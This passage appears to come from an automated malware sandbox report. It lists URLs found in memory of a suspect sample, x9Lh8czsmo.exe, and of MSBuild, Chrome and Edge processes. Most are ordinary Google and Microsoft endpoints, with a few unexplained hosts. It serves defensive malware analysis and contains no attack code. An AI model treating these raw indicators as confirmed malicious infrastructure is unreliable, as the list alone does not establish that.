Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: MSBuild.exe, 00000002.00000002.1991362026.0000000003948000.00000004.00000020.00020000.00000000.sdmp, u3ecje.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.log1.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log1.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log1.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: 000003.log1.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: msedge.exe, 00000009.00000003.1764566011.000001606D43D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eu-9.smartscreen
Source: msedge.exe, 00000009.00000003.1754012270.00007BAC00C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fb.me/react-polyfills
Source: chromecache_165.7.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_165.7.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_165.7.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_165.7.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: msedge.exe, 00000009.00000003.1758347965.00007BAC02A0C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754012270.00007BAC00C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/focus-trap/tabbable/blob/master/LICENSE
Source: msedge.exe, 00000009.00000003.1758347965.00007BAC02A0C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754012270.00007BAC00C04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/jsstyles/css-vendor
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/$
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/-
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/.
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/8
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/?
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/v
Source: chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000005.00000003.1599244220.00003AC800878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1643947692.0000123804028000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646589793.0000123803B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1646218672.0000123803B48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1644116168.0000123804030000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs27
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://goto.google.com/sme-bugs2e
Source: msedge.exe, 00000009.00000003.1785247106.00007BAC03294000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hk.eynbm.com
Source: gvk6ph.2.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/161903006
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/166809097
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/184850002
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/187425444
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/220069903
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/229267970
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/250706693
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/253522366
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/255411748
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/258207403
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/274859104
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/284462263
Source: msedge.exe, 00000009.00000003.1743713719.00007BAC00388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1649895511.0000123803E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1649849557.0000123803E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000005.00000003.1649895511.0000123803E24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1649849557.0000123803E1C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000005.00000003.1598155653.00003AC80071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000005.00000003.1635168932.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636629079.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1634640330.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000005.00000003.1619091585.000012380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618978566.0000123803300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000005.00000003.1619091585.000012380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618978566.0000123803300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000005.00000003.1599312463.00003AC800880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000005.00000003.1598344218.00003AC800728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login-us.microsoftonline.com/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.chinacloudapi.cn/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.cloudgovapi.us/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoft-ppe.com/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.de/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.us/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.usgovcloudapi.net/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.windows-ppe.net/
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.windows.net/
Source: chrome.exe, 00000005.00000003.1635168932.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636629079.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1634640330.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
Source: msedge.exe, 00000009.00000003.1740066082.00000160669F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://malaysia.smartscreen.mic
Source: chrome.exe, 00000005.00000003.1642339945.0000123803144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1644693557.0000123803144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1641339473.0000123803140000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000005.00000003.1642339945.0000123803144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1644693557.0000123803144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1641339473.0000123803140000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000005.00000003.1615872583.00001238031A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: msedge.exe, 00000009.00000003.1764566011.000001606D43D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://newzealand.smartscreen.m10.0.19045.2006.vb_release
Source: msedge.exe, 00000009.00000003.1787356007.00007BAC020E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ntp.msn
Source: msedge.exe, 00000009.00000003.1787499005.00007BAC027AC000.00000004.00000800.00020000.00000000.sdmp, 000003.log.9.dr String found in binary or memory: https://ntp.msn.com/
Source: Session_13382090435239232.9.dr String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000005.00000003.1637449896.0000123802E88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635792851.000012380361C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615942166.0000123802C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615942166.0000123802C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615942166.0000123802C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615942166.0000123802C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000005.00000003.1634979474.000012380317C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1615942166.0000123802C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/devicemanagement/data/api
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000009.00000003.1745126422.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1743308706.00007BAC003CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: chrome.exe, 00000005.00000003.1615872583.00001238031A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000005.00000003.1619091585.000012380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618978566.0000123803300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618772647.0000123802514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1618476289.0000123802E88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chromecache_165.7.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_168.7.dr String found in binary or memory: https://plus.google.com
Source: chromecache_168.7.dr String found in binary or memory: https://plus.googleapis.com
Source: chrome.exe, 00000005.00000003.1615872583.00001238031A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: msedge.exe, 00000009.00000003.1782618540.00007BAC0054C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://res.cdn.office.net/
Source: msedge.exe, 00000009.00000003.1754965752.00007BAC029A8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754928245.00007BAC02978000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754699229.00007BAC0290C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754775930.00007BAC028FC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754573554.00007BAC02968000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754803717.00007BAC029C0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1753974560.00007BAC028EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754447420.00007BAC021B8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000009.00000003.1754605445.00007BAC00764000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sapphire.azureedge.net
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000005.00000003.1642234102.0000123803A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shieldedids-pa.googleapis.comb
Source: chrome.exe, 00000005.00000003.1630860312.00001238024A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000005.00000003.1635168932.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636629079.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1634640330.0000123803598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636686729.00001238035B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1636744125.0000123803694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635279712.0000123803658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635448145.0000123803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1635361646.0000123803660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
